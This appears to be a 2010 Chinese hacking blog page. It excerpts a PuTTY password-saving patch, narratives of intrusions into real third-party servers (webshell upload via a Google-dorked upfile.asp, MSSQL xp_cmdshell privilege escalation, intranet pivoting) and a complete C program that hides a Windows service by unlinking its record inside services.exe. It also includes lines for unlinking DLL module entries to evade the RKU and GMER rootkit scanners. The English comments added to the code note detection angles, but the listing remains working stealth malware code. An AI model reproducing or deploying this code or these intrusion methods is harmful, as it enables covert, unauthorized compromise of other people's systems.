为Putty 0.6 增加SSH 密码保存且自动登录功能

2010年8月21日 没有评论 208 views

1、setup_config_box :
putty 的界面的处理方式是很值得研究研究的。 首先要考虑在原有的界面上把新加的输入password 的文本框放在什么地方,个人认为把新加入的文本框放在原有的输入port 端口后面的文本框后面是一个比较好的选择。
修改: line :1155 行的

ctrl_columns(s, 2, 75, 25);

改为

ctrl_columns(s, 3, 50, 25,25);

后面的数字只是一个比例。
添加: line : 1165 后加入:


MSSQL 入侵提权之内网渗透案例分析

2010年7月17日 1 条评论 773 views

图文:udb311
主题:MSSQL内网渗透案例分析
发表:黑白前线

描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。

环境:2003 SERVER
IIS :6.0 支持php
数据库:MSSQL和MYSQL
网站类型:ASPX

本文重点讲述内网渗透提权部分,对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道,拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很平常么。没发现SU和MYSQL之类的信息。



渗透某大型内网入侵过程

2010年7月17日 没有评论 1,258 views

本文阐述:文章从网站入侵到内网渗透提权,作者给大家带来了一篇精彩的内网渗透文章。读完此文你能清晰地认识到内网入侵的细节技术。

由于平时比较忙,用了很久的VPN肉鸡飞掉了,近来正好有时间于是打开google搜索upfile.asp开始找肉鸡,来了台湾某XX站,http://xxx.xxx.tw/xx/upfile.asp,为了不必要的麻烦,我隐藏了敏感内容。直接到传asp提示错误,那么直接传了gif以后,查看上传路径发现自己重命名了,如果没有重命名的话在IIS6下百分之90以上可以拿shell了,除去目录末有执行脚本权限。最后抓包分析改上传路径,最后得到一个shell,图1。具体方法翻翻以前杂志或google找吧,一找一大堆。

大型内网渗透1

执行命令后,发现权限还比较大,能够执行一些简单命令,像net user、ipconfig /all等等。。



ring3下隐藏服务的代码

2010年7月14日 没有评论 158 views

来自:ASM

过RKU,GMAER的dll模块检查的代码,就两句:

ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;

//下面是一个ring3下隐藏服务的代码,也是抄别人小小修改了一下而已的:

#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#include <Tlhelp32.h>

// A few undocumented structures: forward declarations for the services.exe
// internals reconstructed below. Nothing here is a public Windows API; the
// layouts are the author's reconstruction and should be treated as
// specific to the Windows build they were taken from.

typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

// Per-hosting-process record (doubly linked). Only the leading fields are
// reconstructed; the trailing "// ..." marks unknown tail members, so
// sizeof() of this struct is NOT the real record size. Not dereferenced by
// the code in this listing.
typedef struct _SC_SERVICE_PROCESS

{

PSC_SERVICE_PROCESS Previous;

PSC_SERVICE_PROCESS Next;

WCHAR *ImagePath;

DWORD Pid;

DWORD NumberOfServices;

// ...

} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

// Dependency list node (singly linked via Next). Partial layout; the Unknow
// field's meaning is not established. Not dereferenced by this listing.
typedef struct _SC_DEPEND_SERVICE

{

PSC_DEPEND_SERVICE Next;

DWORD Unknow;

PSC_SERVICE_RECORD Service;

// ...

} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

// One entry of the service database list inside services.exe (doubly
// linked through Previous/Next). HideService() relies on Previous being
// the first DWORD and Next the second of the record, and
// FindFirstServiceRecord() uses sErv == 'vrEs' (the bytes "sErv" read as a
// little-endian DWORD) as the signature of a genuine record. Partial
// layout: the tail is unknown, so sizeof() is only the reconstructed prefix.
typedef struct _SC_SERVICE_RECORD

{

PSC_SERVICE_RECORD Previous;

PSC_SERVICE_RECORD Next;

WCHAR *ServiceName;

WCHAR *DisplayName;

DWORD Index;

DWORD Unknow0;

// Tag field compared against the multi-character constant 'vrEs'.
DWORD sErv;

DWORD ControlCount;

DWORD Unknow1;

PSC_SERVICE_PROCESS Process;

SERVICE_STATUS Status;

DWORD StartType;

DWORD ErrorControl;

DWORD TagId;

PSC_DEPEND_SERVICE DependOn;

PSC_DEPEND_SERVICE Depended;

// ...

} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

// Convert a NUL-terminated wide string to ANSI (CP_ACP) into lpChar.
// Returns the WideCharToMultiByte result: the byte count written including
// the terminator, or 0 on failure.
// Caller contract: lpChar must be large enough for the converted string —
// nothing here bounds the second conversion to the caller's buffer, and the
// only caller (HideService) passes a 256-byte array it has already zeroed.
int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)

{

int iLen;

// First call: size query only (cbMultiByte == 0).
iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);

// NOTE(review): with `||` this condition holds for every possible iLen
// (any value satisfies at least one side), so the branch is unconditional.
if ((iLen > 1) || (iLen < 20))

{

// Clears a fixed 40 bytes, independent of iLen or the real buffer size.
ZeroMemory(lpChar, 40);

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);

}

return iLen;

}

// Enable SeDebugPrivilege on the current process token.
// Returns the result of AdjustTokenPrivileges, or FALSE when the token
// could not be opened or the privilege LUID could not be looked up. The
// token handle is closed on every path.
BOOL SetDebugPrivilege()
{
    HANDLE token = NULL;
    LUID debugLuid;
    TOKEN_PRIVILEGES privs;
    BOOL enabled = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
        goto done;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &debugLuid))
        goto done;

    privs.PrivilegeCount = 1;
    privs.Privileges[0].Luid = debugLuid;
    privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // Note: AdjustTokenPrivileges reports success even when the privilege
    // is not held; the caller only sees its BOOL result.
    enabled = AdjustTokenPrivileges(token, FALSE, &privs,
                                    sizeof(TOKEN_PRIVILEGES), NULL, NULL);

done:
    if (token) CloseHandle(token);
    return enabled;
}

// Look up a running process by executable name (case-insensitive, via
// lstrcmpi) using a Toolhelp snapshot.
// Returns the PID of the first match, or (DWORD)-1 when the snapshot could
// not be taken or no process matched. The snapshot handle is always closed.
DWORD GetProcessIdByName(char *Name)
{
    DWORD foundPid = (DWORD)-1;
    PROCESSENTRY32 entry;
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    BOOL more;

    if (snapshot == INVALID_HANDLE_VALUE)
        return (DWORD)-1;

    ZeroMemory(&entry, sizeof(entry));
    entry.dwSize = sizeof(entry);   // required by Process32First

    for (more = Process32First(snapshot, &entry); more;
         more = Process32Next(snapshot, &entry)) {
        if (lstrcmpi(entry.szExeFile, Name) == 0) {
            foundPid = entry.th32ProcessID;
            break;
        }
    }

    CloseHandle(snapshot);
    return foundPid;
}

// Write one DWORD into another process at Addr, temporarily making the
// containing region PAGE_READWRITE. The first VirtualProtectEx stores the
// previous protection in mbi.Protect, which the second call restores;
// dwOldProtect only receives the intermediate value and is otherwise unused.
// None of the four API results is checked, so a failed write is silent.
// Detection angle: a user-mode process taking a handle to services.exe and
// calling WriteProcessMemory on it is the observable event here.

void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)

{

MEMORY_BASIC_INFORMATION mbi;

DWORD dwOldProtect, dwWritten;

VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);

WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);

}

// Locate the head of the service-record list inside the live services.exe
// (hProcess). The on-disk %SystemRoot%\system32\Services.exe image is
// mapped read-only and scanned for the byte pattern the author attributes
// to services!ScGetServiceDatabase; the DWORD at pattern offset +4 is taken
// as the address of a pointer to the first record in the running process,
// which is then read and validated by its sErv == 'vrEs' tag.
// Returns that record's address in the target process, or NULL when the
// file cannot be opened/mapped or no validated match is found.
// Assumes the pointer embedded in the file image is valid unrelocated in
// the running process — confirm; this is build-specific.
// Resource note: the early returns after CreateFileMapping/MapViewOfFile
// failures leak hFile (and hFileMap).

PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)

{

char FileName[MAX_PATH+1];

HANDLE hFile, hFileMap;

UCHAR * pMap;

DWORD dwSize, dwSizeHigh, i, dwRead;

SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

GetSystemDirectory( FileName, MAX_PATH );

// Unbounded strcat: fine only while the system directory leaves room for
// "\Services.exe" within MAX_PATH.
strcat( FileName,"\\Services.exe");

hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,

NULL, OPEN_EXISTING, 0, NULL);

if (INVALID_HANDLE_VALUE == hFile) return NULL;

dwSizeHigh = 0;

// Only the low 32 bits of the size are used.
dwSize = GetFileSize(hFile, &dwSizeHigh);

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);

if (NULL == hFileMap) return NULL;

pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);

if (NULL == pMap) return NULL;

// The scan reads up to offset i+11, so stop 12 bytes short of the end.
dwSize -= 12;

for (i=0; i<dwSize; ++i)

{

// Search for the services!ScGetServiceDatabase signature bytes

if (*(DWORD*)(pMap+i) == 0xa1909090 &&

*(DWORD*)(pMap+i+8) == 0x909090c3)

{

// Follow the embedded pointer in the live process, then read the
// record it points at and check its tag.
if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&

ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

SvcRd.sErv == 'vrEs') // signature of the ServiceRecord structure

{

pRet = pSvcRd;

break;

}

}

}

UnmapViewOfFile(pMap);

CloseHandle(hFileMap);

CloseHandle(hFile);

//printf( "addr: 0x%08x\n", (DWORD *)pRet );

return pRet;

}

// Hide a service: unlink the record named `Name` from the service list
// inside services.exe by patching its neighbours' Previous/Next pointers.
// Steps: find Services.exe's PID, enable SeDebugPrivilege, open the process
// with PROCESS_ALL_ACCESS, locate the first record, then walk Next until a
// name matches. Returns TRUE after the two pointer writes, FALSE on any
// setup failure or if no record matched. Error paths print to stdout.
//
// Behaviour worth knowing when reading this as a defender:
//  - the comparison is a case-insensitive PREFIX match: only
//    strlen(Name)*2 bytes of the wide name are read into a zero-filled
//    buffer, so a longer service name that begins with Name also matches;
//  - the writes are not verified, and if the matched record is the first
//    or last in the list, Previous or Next is presumably NULL and that
//    write simply fails — confirm against the real list layout;
//  - the record itself is left intact in memory, so forensic tooling that
//    scans services.exe for 'vrEs'-tagged records can still find it.

BOOL HideService(char *Name)

{

DWORD Pid;

HANDLE hProcess;

SC_SERVICE_RECORD SvcRd, *pSvcRd;

DWORD dwRead, dwNameSize;

// Zero-initialised so the partial read below is always NUL-terminated.
WCHAR SvcName[MAX_PATH] = { 0 };

char lpSvcName[256] = {0};

dwNameSize = strlen(Name)*2; // UTF-16: byte length is twice the character count (terminator excluded)

if (dwNameSize > sizeof(SvcName))

{

return FALSE;

}

Pid = GetProcessIdByName("Services.exe");

// GetProcessIdByName returns (DWORD)-1 on failure; the comparison works
// through the usual unsigned conversion.
if (Pid == -1)

{

printf("get pid error\r\n");

return FALSE;

}

if(!SetDebugPrivilege())

{

printf("SetDebugPrivilege error\r\n");

return FALSE;

}

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

if (NULL == hProcess)

{

printf("OpenProcess error:%d\r\n",GetLastError());

return FALSE;

}

pSvcRd = FindFirstServiceRecord(hProcess);

if (NULL == pSvcRd)

{

printf("FindFirstServiceRecord error\r\n");

CloseHandle(hProcess);

return FALSE;

}

do

{

// Read the record, then only dwNameSize bytes of its name.
if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))

{

//OutputDebugStringW(SvcName);

// match the service name

memset(lpSvcName,0,sizeof(lpSvcName));

UnicodeToAnsiStr(lpSvcName,SvcName);

// lstrcmpi returns an int; comparing it with NULL is just `== 0`.
if (lstrcmpi(lpSvcName, Name) == NULL)

{

// Unlink from the list (the ServiceRecord is normally writable, but change the page protection first just in case)

// Previous->Next (second DWORD of the previous record) = this->Next
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);

// Next->Previous (first DWORD of the next record) = this->Previous
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);

CloseHandle(hProcess);

return TRUE;

}

}

else

{

// A failed read ends the walk; FALSE is returned below.
break;

}

}

while (pSvcRd = SvcRd.Next);

// hProcess is non-NULL on every path that reaches here, so the guard is
// redundant but harmless.
if( NULL != hProcess )

{

CloseHandle(hProcess);

}

return FALSE;

}

// Entry point: attempts to hide the "Alerter" service. The BOOL result of
// HideService() is discarded, so the process exit code is 0 whether or not
// the unlink happened; failure details are only what HideService printed.
int main()

{

HideService("Alerter");

return 0;

}
